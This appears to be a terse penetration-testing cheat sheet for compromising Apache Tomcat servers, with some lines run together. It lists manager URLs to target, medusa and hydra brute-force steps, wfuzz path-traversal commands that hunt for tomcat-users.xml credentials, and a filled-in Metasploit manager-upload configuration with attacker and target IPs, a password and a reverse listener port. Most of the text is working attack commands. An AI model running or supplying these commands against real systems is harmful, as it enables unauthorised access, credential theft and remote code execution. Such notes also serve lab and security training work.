Apache Tomcat
Reconnaissance
ping
nmapURL
- http://$IP:8080/manager/status
- http://$IP:8080/manager/html
- http://$IP:8080/host-manager/html
Bruteforce attack
user.txt
pass.txtmedusa – /manager/status
hydra – /manager/statusmedusa – /manager/html
hydra – /manager/htmlmedusa – /host-manager/html
hydra – /host-manager/htmlEnumeration users.xml
path.txt
etc
conf
var
lib
ROOT
usr
share
doc
opt
tomcat7
tomcat8
tomcat9
webapps
tomcat7-common
tomcat8-common
tomcat9-common
wfuzz -c -w path.txt -w path.txt --prefilter "FUZZ!=FUZ2Z" -u http://$URL/news.php?file=../../../../FUZZ/FUZ2Z/tomcat-users.xml --hl 0
wfuzz -c -w path.txt -w path.txt -w path.txt --prefilter "FUZZ!=FUZ2Z and FUZZ!=FUZ3Z and FUZ2Z!=FUZ3Z" -u http://$URL/news.php?file=../../../../FUZZ/FUZ2Z/FUZ3Z/tomcat-users.xml --hl 0
wfuzz -c -w path.txt -w path.txt -w path.txt -w path.txt --prefilter "FUZZ!=FUZ2Z and FUZZ!=FUZ3Z and FUZZ!=FUZ4Z and FUZ2Z!=FUZ3Z and FUZ2Z!=FUZ4Z and FUZ3Z!=FUZ4Z" -u http://$URL/news.php?file=../../../../FUZZ/FUZ2Z/FUZ3Z/FUZ4Z/tomcat-users.xml --hl 0
Explotation
exploit 1 – metasploit
use exploit/multi/http/tomcat_mgr_uploa
set RHOST 10.10.10.95
set RPORT 8080
set LHOST 10.10.14.16
set LPORT 4444
set HttpUsername tomcat
set HttpPassword s3cret
options
run
exploit 2 – shell.war
payload
listenerexploit 3 – shell.war
payload
listener